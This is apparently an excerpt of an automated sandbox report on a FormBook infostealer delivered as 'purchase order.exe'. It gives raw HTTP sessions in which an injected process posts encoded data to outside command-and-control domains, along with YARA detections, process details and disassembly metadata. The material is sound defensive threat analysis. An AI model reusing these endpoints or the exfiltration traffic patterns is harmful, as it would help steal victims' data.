                                                                                                            19 | 192.168.2.4 | 49999 | 129.226.153.85 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:34:10.739825010 CET | 10784 | OUT | POST /pfw9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.1qcczjvh2.autos
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.1qcczjvh2.autos
                                                                                                            Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Ascii: yhXxt4VH= [TRUNCATED]


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            20 | 192.168.2.4 | 50005 | 129.226.153.85 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Dec 6, 2024 09:34:13.391891956 CET | 412 | OUT | GET /pfw9/?yhXxt4VH=45l5W170mEENNSUnzK4z1bTcnj7w1ape/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZPlZ4cFkLSrPaRO4QE3Rmb2BtP350cPbvkbU=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.1qcczjvh2.autos
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:34:14.928694010 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: Tengine
                                                                                                            Date: Fri, 06 Dec 2024 08:34:14 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Content-Length: 58288
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: "67344967-e3b0"
                                                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 50021 | 104.21.7.187 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 09:34:20.892209053 CET | 670 | OUT | POST /4gxa/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.gk88top.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.gk88top.top
                                                                                                            Referer: http://www.gk88top.top/4gxa/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 58 67 31 68 6e 79 77 32 64 78 44 61 7a 70 36 78 4b 56 4d 4a 44 59 50 33 45 37 5a 35 44 36 34 4b 47 52 39 42 5a 44 31 38 59 33 4a 6e 72 4f 7a 65 7a 57 38 49 30 76 59 54 42 73 49 69 2f 72 4a 42 59 30 4c 34 63 6b 77 49 36 76 66 6c 59 63 56 56 42 30 64 73 6f 31 44 6a 32 53 38 47 77 53 6a 33 32 31 57 42 4f 4c 69 32 39 71 36 71 65 46 76 79 2f 70 32 62 51 4b 54 4c 7a 49 32 2b 42 38 75 53 6a 67 69 64 30 54 51 77 74 6a 43 67 5a 33 51 6e 69 5a 71 52 59 4d 4a 6c 54 76 66 32 70 6e 32 4e 41 32 31 56 64 51 42 69 6a 44 48 38 70 56 73 58 4f 6a 6a 2f 4b 2f 4d 47 78 66 49 4b 74 76 73 34 41 3d 3d
                                                                                                            Data Ascii: yhXxt4VH=FXg1hnyw2dxDazp6xKVMJDYP3E7Z5D64KGR9BZD18Y3JnrOzezW8I0vYTBsIi/rJBY0L4ckwI6vflYcVVB0dso1Dj2S8GwSj321WBOLi29q6qeFvy/p2bQKTLzI2+B8uSjgid0TQwtjCgZ3QniZqRYMJlTvf2pn2NA21VdQBijDH8pVsXOjj/K/MGxfIKtvs4A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 50027 | 104.21.7.187 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 09:34:23.552150965 CET | 690 | OUT | POST /4gxa/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.gk88top.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.gk88top.top
                                                                                                            Referer: http://www.gk88top.top/4gxa/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 58 67 31 68 6e 79 77 32 64 78 44 49 43 5a 36 7a 6f 39 4d 42 44 59 4d 39 6b 37 5a 77 6a 36 38 4b 47 64 39 42 59 33 6c 38 75 6e 4a 6e 4b 65 7a 66 79 57 38 4c 30 76 59 59 68 73 48 6d 2f 72 4f 42 5a 49 44 34 64 59 77 49 36 72 66 6c 61 45 56 55 32 67 53 76 59 30 6c 72 57 53 79 43 77 53 6a 33 32 31 57 42 4f 66 59 32 39 79 36 72 75 31 76 79 61 64 35 59 51 4b 51 43 54 49 32 36 42 38 71 53 6a 67 63 64 31 2f 36 77 76 62 43 67 59 48 51 6b 7a 59 59 59 59 4d 4c 34 44 75 4f 39 61 32 79 49 79 66 75 55 64 38 57 6c 51 6e 6a 77 50 59 32 47 2f 43 30 74 4b 62 2f 62 32 57 38 48 75 53 6c 6a 44 55 6c 41 75 34 76 37 52 34 58 63 6b 6e 54 45 30 78 75 4c 6c 67 3d
                                                                                                            Data Ascii: yhXxt4VH=FXg1hnyw2dxDICZ6zo9MBDYM9k7Zwj68KGd9BY3l8unJnKezfyW8L0vYYhsHm/rOBZID4dYwI6rflaEVU2gSvY0lrWSyCwSj321WBOfY29y6ru1vyad5YQKQCTI26B8qSjgcd1/6wvbCgYHQkzYYYYML4DuO9a2yIyfuUd8WlQnjwPY2G/C0tKb/b2W8HuSljDUlAu4v7R4XcknTE0xuLlg=
Dec 6, 2024 09:34:25.183080912 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:34:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmOCNn8sTefxI4Gfk%2BRHsnYOaHFyC557m1c7u5N6D0itD91%2FuH0v7%2Bm%2BtsvNRCkDqFrxPmAxHCSUZknzxeIjJcoLZch4y1oGj8JNZdBacAUhgZ5Hdox3b%2Fd%2FLRrNbCvuQ5U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8edaefc6f8d6434a-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1697&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=690&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50032 | 104.21.7.187 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 09:34:26.208620071 CET | 10772 | OUT | POST /4gxa/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.gk88top.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.gk88top.top
                                                                                                            Referer: http://www.gk88top.top/4gxa/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 58 67 31 68 6e 79 77 32 64 78 44 49 43 5a 36 7a 6f 39 4d 42 44 59 4d 39 6b 37 5a 77 6a 36 38 4b 47 64 39 42 59 33 6c 38 75 76 4a 6e 34 47 7a 64 52 75 38 4b 30 76 59 45 78 73 45 6d 2f 72 54 42 59 67 48 34 64 56 4c 49 35 44 66 6c 2f 59 56 54 44 4d 53 34 49 30 6c 70 57 53 2f 47 77 53 36 33 32 6c 53 42 4f 50 59 32 39 79 36 72 73 74 76 37 76 70 35 65 51 4b 54 4c 7a 49 71 2b 42 38 53 53 6a 70 6e 64 31 37 41 78 66 37 43 6e 34 58 51 30 56 73 59 58 59 4d 4e 37 44 75 57 39 61 36 39 49 79 44 69 55 64 34 77 6c 54 37 6a 68 37 42 7a 65 75 6a 76 35 61 54 56 49 33 6d 4a 42 4f 71 4f 6f 31 30 2f 50 72 38 76 37 43 55 47 52 55 61 42 57 57 39 32 55 68 4d 4e 32 76 67 6d 74 4d 69 49 49 39 73 71 30 54 51 57 66 68 67 65 4c 66 44 6c 49 6e 6e 4e 2f 6e 47 76 42 7a 6f 2b 6b 2b 42 32 32 69 75 33 6f 4b 38 38 53 55 64 49 66 6e 63 75 56 34 4b 33 47 37 6c 6c 49 31 76 2f 63 74 45 31 74 2f 4e 49 31 62 4c 78 77 7a 4d 34 76 67 35 4e 51 70 31 62 58 57 75 31 6a 37 50 72 6e 37 76 2b 6e 41 31 77 4e 44 46 66 50 [TRUNCATED]
Data Ascii: yhXxt4VH= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50033 | 104.21.7.187 | 80 | 5216 | C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 09:34:28.928092003 CET | 408 | OUT | GET /4gxa/?yhXxt4VH=IVIViSCd4+diLw5hx6pqKzAzzXjH0VWsQQRVAN/m1p/rxaGnfzS1IkXZSHFapfjNT88wuN41KZDTvbIxWygy4ZsRlEWQLVi632NRXOHwjbynndNV+ecoPQE=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.gk88top.top
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Dec 6, 2024 09:34:30.508099079 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:34:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbI1T69%2F7I8Np3e3TU33p0QgYCVGOYcLkBtlm3w5vKavK46mwtWkd664WccANxvBdY%2B3kVVGjWRlZQlaWvtbotMeVvxMTmThaCrqbgIj8OaEwYeUQ2A419yq3I%2BENpqdOBk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8edaefe85a668c60-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=408&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 [TRUNCATED]
                                                                                                            Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;
Dec 6, 2024 09:34:30.508193016 CET | 657 | IN | Data Raw: 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b
                                                                                                            Data Ascii: padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}
                                                                                                            Data Ascii: 7L8DgcVH9K8YoX9RCQCgIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33
                                                                                                            Dec 6, 2024 09:34:31.027293921 CET1236INData Raw: 67 79 42 56 74 55 79 4c 64 64 36 55 38 50 7a 4f 30 61 74 32 63 30 67 63 42 30 55 4e 48 48 36 6e 35 41 4f 5a 54 44 71 74 51 61 6a 66 67 52 6b 4a 5a 57 33 41 54 69 69 51 5a 55 59 6f 4e 50 30 47 39 64 6d 5a 74 63 4f 43 7a 65 39 69 4b 37 50 58 59 44
                                                                                                            Data Ascii: gyBVtUyLdd6U8PzO0at2c0gcB0UNHH6n5AOZTDqtQajfgRkJZW3ATiiQZUYoNP0G9dmZtcOCze9iK7PXYDAv2TDPgU66oqD5ufAYVGBcxIUriXawyUOq1e98LOQg8seIt2Uvdh4+fum5+9f6ww7tdnUnDA+pEGHfV8c2578tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pP



                                                                                                            Target ID:0
                                                                                                            Start time:03:31:23
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Users\user\Desktop\purchase order.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\purchase order.exe"
                                                                                                            Imagebase:0xc0000
                                                                                                            File size:738'304 bytes
                                                                                                            MD5 hash:79BFE4CD6855C69C57C3B6B3A2AD898F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:03:31:42
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Users\user\Desktop\purchase order.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\purchase order.exe"
                                                                                                            Imagebase:0xac0000
                                                                                                            File size:738'304 bytes
                                                                                                            MD5 hash:79BFE4CD6855C69C57C3B6B3A2AD898F
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:03:32:25
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe"
                                                                                                            Imagebase:0xb40000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:7
                                                                                                            Start time:03:32:28
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                                                                            Imagebase:0x740000
                                                                                                            File size:27'648 bytes
                                                                                                            MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:8
                                                                                                            Start time:03:32:41
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe"
                                                                                                            Imagebase:0xb40000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:10
                                                                                                            Start time:03:32:54
                                                                                                            Start date:06/12/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true


                                                                                                              Execution Graph

                                                                                                              Execution Coverage:12.6%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:3.7%
                                                                                                              Total number of Nodes:214
                                                                                                              Total number of Limit Nodes:18
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4|cq$4|cq$U$$^q
                                                                                                              • API String ID: 0-1576285732
                                                                                                              • Opcode ID: 74722978544665ead4ced87561c87dec89d7c9d82fadca019b5be4b389d7ee93
                                                                                                              • Instruction ID: d89934ead93879267ef7dfffe08abcf22e907b947688e83809835d2bc2e30afc
                                                                                                              • Opcode Fuzzy Hash: 74722978544665ead4ced87561c87dec89d7c9d82fadca019b5be4b389d7ee93
                                                                                                              • Instruction Fuzzy Hash: 7E631974A00219CFCB24DF69C888A9DB7B2FF88310F558599E519AB365DB34ED82CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fcq
                                                                                                              • API String ID: 0-2768158334
                                                                                                              • Opcode ID: b38d590110915bb445fab468aef161ece5c205dc3bc4a44ea52491ddf826dad8
                                                                                                              • Instruction ID: 6ee65d1d1fc511911875e819b4cf6029af38be95646fa39706c2700dbc9fb045
                                                                                                              • Opcode Fuzzy Hash: b38d590110915bb445fab468aef161ece5c205dc3bc4a44ea52491ddf826dad8
                                                                                                              • Instruction Fuzzy Hash: 6081C574E01218DFDB08DFA9C994ADEBBB2FF88304F148529E409AB365DB359946CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fcq
                                                                                                              • API String ID: 0-2768158334
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                              • API String ID: 0-1677660839

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hbq$Hbq
                                                                                                              • API String ID: 0-4258043069

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 3$gl
                                                                                                              • API String ID: 0-3870923017

                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 068E6EFE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0

                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 068E6EFE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
